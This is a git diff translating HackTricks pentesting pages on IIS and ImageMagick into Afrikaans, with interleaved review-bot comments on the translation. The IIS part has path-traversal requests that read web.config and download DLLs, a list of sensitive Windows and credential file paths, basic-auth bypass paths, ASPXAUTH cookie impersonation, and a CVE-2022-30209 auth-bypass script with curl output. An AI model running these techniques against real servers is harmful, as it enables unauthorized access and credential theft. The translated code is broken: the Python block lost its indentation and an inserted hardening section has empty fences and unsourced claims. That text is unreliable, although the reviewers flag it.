`applicationHost.config`-lêer. Hierdie parameter verseker dat die bediener die hostnaam in plaas van die IP-adres in die HTTP-respons gebruik. + + ```plaintext + + + + + + + + ``` + +2. Stel die `forwardWindowsAuthToken`-parameter in op `false` in die `applicationHost.config`-lêer. Hierdie parameter voorkom dat die bediener die interne IP-adres in die `WWW-Authenticate`-kop van die respons insluit. + + ```plaintext + + + + + + + + ``` + +Deur hierdie stappe te volg, kan jy die risiko van die bekendmaking van die interne IP-adres van jou IIS-bediener verminder. ``` -GET / HTTP/1.0 +GET / HTTP/1.0 HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache 
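Review bot: the `@@ -1,39 +1,66 @@` hunk replaces the one-line label `Response disclosing the internal IP:` with a new `### Response wat die interne IP-adres bekend maak:` section containing a remediation walkthrough (`UseHostName` in `applicationHost.config`, `forwardWindowsAuthToken` and the `WWW-Authenticate` header) that has no counterpart in the removed lines. This is added, unsourced content rather than translation: both numbered steps carry an empty `plaintext` fence, the assertion that `forwardWindowsAuthToken` governs whether the internal IP appears in `WWW-Authenticate` is backed by nothing on the page, and the inserted text now sits between `Binne die respons kan die Location-kop na die interne IP-adres verwys:` and the response capture that sentence introduces, so the example no longer follows its lead-in. Restore the label as a plain translated sentence and move any hardening guidance to a separate, referenced PR. The hunk also drops the blank lines that separated `## Openbaarmaking van interne IP-adres` from its paragraph and the paragraph from the fence; keep them to match the source layout.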
@@ -42,20 +69,19 @@ Location: https://192.168.5.237/owa/ Server: Microsoft-IIS/10.0 X-FEServer: NHEXCHANGE2016 ``` +## Voer .config-lêers uit -## Execute .config files +Jy kan .config-lêers oplaai en dit gebruik om kode uit te voer. Een manier om dit te doen, is om die kode aan die einde van die lêer te voeg binne 'n HTML-kommentaar: [Laai voorbeeld hier af](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config) -You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config) +Meer inligting en tegnieke om hierdie kwesbaarheid uit te buit [hier](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) -More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) +## IIS Ontdekking Bruteforce -## IIS Discovery Bruteforce - -Download the list that I have created: +Laai die lys af wat ek geskep het: {% file src="../../.gitbook/assets/iisfinal.txt" %} -It was created merging the contents of the following lists: +Dit is geskep deur die inhoud van die volgende lyste saam te voeg: [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\ [http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\ 
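Review bot: in the `@@ -42,20 +69,19 @@` hunk the two new paragraphs `+Jy kan .config-lêers oplaai ...` and `+Meer inligting en tegnieke ...` are emitted back to back with no blank `+` line between them, while the source kept them apart; if that is how the file reads after the patch, markdown will merge them into one paragraph, so add the separator. `## IIS Ontdekking Bruteforce` mixes an Afrikaans noun with an English one; either keep the section name as it is in the source or write it consistently (`IIS-ontdekking met brute force`), matching how `brute force` is handled elsewhere in the patch.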
@@ -64,72 +90,65 @@ It was created merging the contents of the following lists: [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\ [https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt) -Use it without adding any extension, the files that need it have it already. +Gebruik dit sonder om enige uitbreiding by te voeg, die lêers wat dit nodig het, het dit reeds. -## Path Traversal +## Pad Traversal -### Leaking source code +### Uitlek van bronkode -Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html) +Kyk na die volledige bespreking by: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html) {% hint style="info" %} -As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\ -From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\ -Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\ +As opsomming, daar is verskeie web.config-lêers binne die toepassings se lêers met verwysings na "**assemblyIdentity**" lêers en "**namespaces**". 
Met hierdie inligting is dit moontlik om te weet **waar uitvoerbare lêers geleë is** en om hulle af te laai.\ +Van die **afgelaaide Dlls** is dit ook moontlik om **nuwe namespaces** te vind waar jy probeer toegang kry en die web.config-lêer te kry om nuwe namespaces en assemblyIdentity te vind.\ +Ook kan die lêers **connectionstrings.config** en **global.asax** interessante inligting bevat.\ {% endhint %} -In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags. +In **.Net MVC-toepassings** speel die **web.config**-lêer 'n belangrike rol deur elke binêre lêer wat die toepassing afhanklik is, te spesifiseer deur middel van **"assemblyIdentity"** XML-etikette. -### **Exploring Binary Files** - -An example of accessing the **web.config** file is shown below: +### **Verkenning van Binêre Lêers** +'n Voorbeeld van toegang tot die **web.config**-lêer word hieronder getoon: ```markup GET /download_page?id=..%2f..%2fweb.config HTTP/1.1 Host: example-mvc-application.minded ``` +Hierdie versoek openbaar verskeie instellings en afhanklikhede, soos: -This request reveals various settings and dependencies, such as: +- **EntityFramework** weergawe +- **AppSettings** vir webbladsye, klientvalidasie, en JavaScript +- **System.web** konfigurasies vir outentifikasie en uitvoertyd +- **System.webServer** modules-instellings +- **Runtime** saamgestelde bindings vir verskeie biblioteke soos **Microsoft.Owin**, **Newtonsoft.Json**, en **System.Web.Mvc** -- **EntityFramework** version -- **AppSettings** for webpages, client validation, and JavaScript -- **System.web** configurations for authentication and runtime -- **System.webServer** modules settings -- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc** +Hierdie instellings dui daarop dat sekere lêers, soos **/bin/WebGrease.dll**, binne die aansoek se 
/bin-vouer geleë is. -These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder. +### **Hoofgidslêers** -### **Root Directory Files** +Lêers wat in die hoofgids gevind word, soos **/global.asax** en **/connectionstrings.config** (wat sensitiewe wagwoorde bevat), is noodsaaklik vir die konfigurasie en werking van die aansoek. -Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation. - -### **Namespaces and Web.Config** - -MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**: +### **Namespaces en Web.Config** +MVC-aansoeke definieer ook addisionele **web.config-lêers** vir spesifieke namespaces om herhalende verklarings in elke lêer te voorkom, soos gedemonstreer met 'n versoek om 'n ander **web.config** af te laai: ```markup GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1 Host: example-mvc-application.minded ``` +### **Aflaai van DLLs** -### **Downloading DLLs** - -The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown: - +Die vermelding van 'n aangepaste namespace dui op 'n DLL met die naam "**WebApplication1**" wat in die /bin-gids aanwesig is. Daarna word 'n versoek om die **WebApplication1.dll** af te laai, getoon: ```markup GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1 Host: example-mvc-application.minded ``` +Dit dui op die teenwoordigheid van ander noodsaaklike DLL's, soos **System.Web.Mvc.dll** en **System.Web.Optimization.dll**, in die /bin gids. 
-This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory. +In 'n scenario waar 'n DLL 'n naamsruimte genaamd **WebApplication1.Areas.Minded** invoer, kan 'n aanvaller die bestaan van ander web.config-lêers in voorspelbare paaie aflei, soos **/area-naam/Views/**, wat spesifieke konfigurasies en verwysings na ander DLL's in die /bin gids bevat. Byvoorbeeld, 'n versoek na **/Minded/Views/web.config** kan konfigurasies en naamsruimtes openbaar wat die teenwoordigheid van 'n ander DLL, **WebApplication1.AdditionalFeatures.dll**, aandui. -In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**. - -### Common files - -From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) +### Algemene lêers +Van [hier](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) ``` C:\Apache\conf\httpd.conf C:\Apache\logs\access.log @@ -193,7 +212,7 @@ C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\winevt\Logs\Application.evtx C:\Windows\System32\winevt\Logs\Security.evtx C:\Windows\System32\winevt\Logs\System.evtx -C:\Windows\win.ini +C:\Windows\win.ini C:\xampp\apache\conf\extra\httpd-xampp.conf C:\xampp\apache\conf\httpd.conf C:\xampp\apache\logs\access.log 
@@ -206,73 +225,71 @@ C:\xampp\security\webdav.htpasswd C:\xampp\sendmail\sendmail.ini C:\xampp\tomcat\conf\server.xml ``` +## HTTPAPI 2.0 404 Fout -## HTTPAPI 2.0 404 Error +As jy 'n fout soos die volgende sien: -If you see an error like the following one: +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>) -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>) +Dit beteken dat die bediener **nie die korrekte domeinnaam** in die Host-kop ingekry het nie.\ +Om toegang tot die webblad te verkry, kan jy kyk na die bediende **SSL-sertifikaat** en miskien kan jy die domein/subdomeinnaam daarin vind. As dit nie daar is nie, moet jy dalk **VHosts** met geweld afdwing totdat jy die korrekte een vind. -It means that the server **didn't receive the correct domain name** inside the Host header.\ -In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. 
+## Ouer IIS-gebreklikhede wat die moeite werd is om na te kyk -## Old IIS vulnerabilities worth looking for +### Microsoft IIS tilde-karakter "\~" Gebrek/Funksie - Kort lêernaam-/vouernaam-onthulling -### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure +Jy kan probeer om **vouers en lêers** binne elke ontdekte vouer op te som (selfs as dit Basiese Verifikasie vereis) deur hierdie **tegniek** te gebruik.\ +Die grootste beperking van hierdie tegniek as die bediener kwesbaar is, is dat dit slegs tot die eerste 6 letters van die naam van elke lêer/vouer en die eerste 3 letters van die uitbreiding van die lêers kan vind. -You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\ -The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files. 
- -You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/` +Jy kan [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) gebruik om vir hierdie kwesbaarheid te toets:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/` ![](<../../.gitbook/assets/image (183).png>) -Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf) +Oorspronklike navorsing: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf) -You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` +Jy kan ook **metasploit** gebruik: `use scanner/http/iis_shortname_scanner` -### Basic Authentication bypass +### Basiese Verifikasie omseil -**Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php` +**Omseil** 'n basiese verifikasie (**IIS 7.5**) deur te probeer om toegang te verkry tot: `/admin:$i30:$INDEX_ALLOCATION/admin.php` of `/admin::$INDEX_ALLOCATION/admin.php` -You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication. +Jy kan probeer om hierdie **kwesbaarheid** en die vorige een te **kombineer** om nuwe **vouers** te vind en die verifikasie te **omseil**. -## ASP.NET Trace.AXD enabled debugging +## ASP.NET Trace.AXD geaktiveerde foutopsporing -ASP.NET include a debugging mode and its file is called `trace.axd`. 
+ASP.NET sluit 'n foutopsporingsmodus in en sy lêer word `trace.axd` genoem. -It keeps a very detailed log of all requests made to an application over a period of time. +Dit hou 'n baie gedetailleerde logboek van alle versoek wat oor 'n tydperk na 'n toepassing gestuur word. -This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords. +Hierdie inligting sluit in die IP-adresse van afgeleë kliënte, sessie-ID's, alle versoek- en antwoordkoekies, fisiese paaie, bronkode-inligting, en moontlik selfs gebruikersname en wagwoorde. [https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/) ![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png) -## ASPXAUTH Cookie +## ASPXAUTH-koekie -ASPXAUTH uses the following info: +ASPXAUTH gebruik die volgende inligting: -* **`validationKey`** (string): hex-encoded key to use for signature validation. -* **`decryptionMethod`** (string): (default “AES”). -* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros). -* **`decryptionKey`** (string): hex-encoded key to use for decryption. +* **`validationKey`** (string): heksgekodeerde sleutel wat gebruik word vir handtekeningvalidering. +* **`decryptionMethod`** (string): (verstek "AES"). +* **`decryptionIV`** (string): heksgekodeerde inisialisasievektor (verstek is 'n vektor van nulle). +* **`decryptionKey`** (string): heksgekodeerde sleutel wat gebruik word vir dekripsie. -However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. 
Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\ -This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19). +Sommige mense sal egter die **verstekwaardes** van hierdie parameters gebruik en die **e-pos van die gebruiker** as **koekie** gebruik. Daarom, as jy 'n webwerf kan vind wat dieselfde platform gebruik en die ASPXAUTH-koekie gebruik, en jy **'n gebruiker met die e-pos van die gebruiker wat jy wil voorstel** op die aangevalle bediener skep, kan jy dalk die koekie van die tweede bediener in die eerste een gebruik en die gebruiker voorstel.\ +Hierdie aanval het gewerk in hierdie [**verslag**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19). -## IIS Authentication Bypass with cached passwords (CVE-2022-30209) - -[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user . +## IIS-verifikasie-omseiling met gestoorde wagwoorde (CVE-2022-30209) +[Volledige verslag hier](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): 'n Fout in die kode het **nie behoorlik vir die wagwoord wat deur die gebruiker gegee is nie**, so 'n aanvaller wie se wagwoordhash 'n sleutel tref wat reeds in die **kas** is, sal in staat wees om as daardie gebruiker aan te meld. 
```python # script for sanity check > type test.py def HashString(password): - j = 0 - for c in map(ord, password): - j = c + (101*j)&0xffffffff - return j +j = 0 +for c in map(ord, password): +j = c + (101*j)&0xffffffff +return j assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT') @@ -284,17 +301,16 @@ HTTP/1.1 401 Unauthorized > curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP HTTP/1.1 200 OK ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
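Review bot: the translated Python sanity-check block for CVE-2022-30209 has lost its indentation and no longer parses: `def HashString(password):` is now followed by `+j = 0`, `+for c in map(ord, password):` and `+return j` at column 0, so the `def` has an empty body and `return` sits outside any function. Restore the four-space indentation the `-` lines had; more generally the translation step should not rewrite lines inside a fenced code block. In the same file, `-C:\Windows\win.ini` / `+C:\Windows\win.ini` is a whitespace-only change in the common-files list that only adds diff noise, and the CVE-2022-30209 sentence is missing its verb ("het nie behoorlik vir die wagwoord wat deur die gebruiker gegee is nie" needs "nagegaan" or "gekontroleer" to say the password was not checked). Terminology also drifts within the file: "toepassing" and "aansoek" are both used for "application" ("aansoek" is a request or application form), "vouer" and "gids" for folder, and the heading "Ouer IIS-gebreklikhede" uses "gebreklikhede" (infirmities) where the body already uses "kwesbaarhede"; "die gebruiker wat jy wil voorstel" should read "die gebruiker as wie jy jou wil voordoen" (impersonate), and "alle versoek wat" should be plural "alle versoeke wat".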
diff --git a/network-services-pentesting/pentesting-web/imagemagick-security.md b/network-services-pentesting/pentesting-web/imagemagick-security.md index 784f6d72a..6b04ed4cf 100644 --- a/network-services-pentesting/pentesting-web/imagemagick-security.md +++ b/network-services-pentesting/pentesting-web/imagemagick-security.md @@ -1,69 +1,65 @@ -# ImageMagick Security +# ImageMagick Sekuriteit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Check further details in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html) +Kyk na verdere besonderhede in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html) -ImageMagick, a versatile image processing library, presents a challenge in configuring its security policy due to its extensive options and lack of detailed online documentation. Users often create policies based on fragmented internet sources, leading to potential misconfigurations. The library supports a vast array of over 100 image formats, each contributing to its complexity and vulnerability profile, as demonstrated by historical security incidents. +ImageMagick, 'n veelsydige beeldverwerking-biblioteek, bied 'n uitdaging in die konfigurasie van sy sekuriteitsbeleid as gevolg van sy uitgebreide opsies en 'n gebrek aan gedetailleerde aanlyn dokumentasie. Gebruikers skep dikwels beleide gebaseer op gefragmenteerde internetbronne, wat moontlike verkeerde konfigurasies tot gevolg het. Die biblioteek ondersteun 'n wye verskeidenheid van meer as 100 beeldformate, wat elk bydra tot sy kompleksiteit en kwesbaarheidsprofiel, soos gedemonstreer deur historiese sekuriteitsvoorvalle. -## Towards Safer Policies -To address these challenges, a [tool has been developed](https://imagemagick-secevaluator.doyensec.com/) to aid in designing and auditing ImageMagick's security policies. This tool is rooted in extensive research and aims to ensure policies are not only robust but also free from loopholes that could be exploited. - -## Allowlist vs Denylist Approach -Historically, ImageMagick policies relied on a denylist approach, where specific coders were denied access. However, changes in ImageMagick 6.9.7-7 shifted this paradigm, enabling an allowlist approach. 
This approach first denies all coders and then selectively grants access to trusted ones, enhancing the security posture. +## Na Veiliger Beleide +Om hierdie uitdagings aan te spreek, is 'n [hulpmiddel ontwikkel](https://imagemagick-secevaluator.doyensec.com/) om te help met die ontwerp en ouditering van ImageMagick se sekuriteitsbeleide. Hierdie hulpmiddel is gegrond op uitgebreide navorsing en streef daarna om te verseker dat beleide nie net robuust is nie, maar ook vry van leemtes wat uitgebuit kan word. +## Allowlist vs Denylist-benadering +Histories het ImageMagick-beleide staatgemaak op 'n denylist-benadering, waar spesifieke koders toegang ontken is. Tog het veranderinge in ImageMagick 6.9.7-7 hierdie paradigma verskuif deur 'n allowlist-benadering moontlik te maak. Hierdie benadering ontken aanvanklik alle koders en verleen dan selektief toegang aan vertroude koders, wat die sekuriteitsposisie versterk. ```xml - ... - - - ... +... + + +... ``` +## Gevalgevoeligheid in Beleide +Dit is van kritieke belang om te let op die gevalgevoeligheid van beleidspatrone in ImageMagick. Dit is noodsaaklik om te verseker dat kodeerders en modules korrek in hoofletters geskryf word in beleide om onbedoelde toestemmings te voorkom. -## Case Sensitivity in Policies -It's crucial to note that policy patterns in ImageMagick are case sensitive. As such, ensuring that coders and modules are correctly upper-cased in policies is vital to prevent unintended permissions. - -## Resource Limits -ImageMagick is prone to denial of service attacks if not properly configured. Setting explicit resource limits in the policy is essential to prevent such vulnerabilities. - -## Policy Fragmentation -Policies may be fragmented across different ImageMagick installations, leading to potential conflicts or overrides. 
It's recommended to locate and verify the active policy files using commands like: +## Hulpbronlimiete +ImageMagick is vatbaar vir 'n diensweieringsaanval as dit nie behoorlik gekonfigureer word nie. Dit is noodsaaklik om eksplisiete hulpbronlimiete in die beleid in te stel om sulke kwesbaarhede te voorkom. +## Beleidsfragmentasie +Beleide kan oor verskillende ImageMagick-installasies gefragmenteer word, wat moontlike konflikte of oorskrywings kan veroorsaak. Dit word aanbeveel om die aktiewe beleidslêers op te spoor en te verifieer deur gebruik te maak van opdragte soos: ```shell $ find / -iname policy.xml ``` +## 'n Aanvangsbeperkende Beleid +'n Beperkende beleidstempel is voorgestel, wat fokus op streng hulpbronbeperkings en toegangsbeheer. Hierdie tempel dien as 'n basislyn vir die ontwikkeling van op maat gemaakte beleide wat in lyn is met spesifieke aansoekvereistes. -## A Starter, Restrictive Policy -A restrictive policy template has been proposed, focusing on stringent resource limitations and access controls. This template serves as a baseline for developing tailored policies that align with specific application requirements. +Die doeltreffendheid van 'n sekuriteitsbeleid kan bevestig word deur die `identify -list policy` opdrag in ImageMagick te gebruik. Daarbenewens kan die [evaluator tool](https://imagemagick-secevaluator.doyensec.com/) wat vroeër genoem is, gebruik word om die beleid te verfyn op grond van individuele behoeftes. -The effectiveness of a security policy can be confirmed using the `identify -list policy` command in ImageMagick. Additionally, the [evaluator tool](https://imagemagick-secevaluator.doyensec.com/) mentioned earlier can be used to refine the policy based on individual needs. - -## References +## Verwysings * [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
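Review bot: "Gevalgevoeligheid in Beleide" mistranslates "Case Sensitivity in Policies" ("geval" is a case in the sense of an instance, not letter case); the section is about upper- versus lower-case coder and module names in policy patterns, so "Hooflettergevoeligheid" is the term needed, otherwise the security point of the section is lost. The `policy.xml` fragment also lost its leading whitespace (`-    ...` became `+...`), the same fence-stripping seen in the IIS page's Python block; indentation inside fenced blocks should be preserved. Minor wording: "beleidstempel" should be "beleidsjabloon" (template) and "aansoekvereistes" should be "toepassingsvereistes". The shared HackTricks footer is translated differently here ("hacktruuks", "github-opslag") than in the IIS page ("hacking-truuks", "GitHub-opslagplekke"); the boilerplate header and footer should be translated once and reused verbatim across files.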
diff --git a/network-services-pentesting/pentesting-web/jboss.md b/network-services-pentesting/pentesting-web/jboss.md index 25bea33df..9aed0021e 100644 --- a/network-services-pentesting/pentesting-web/jboss.md +++ b/network-services-pentesting/pentesting-web/jboss.md @@ -2,57 +2,57 @@
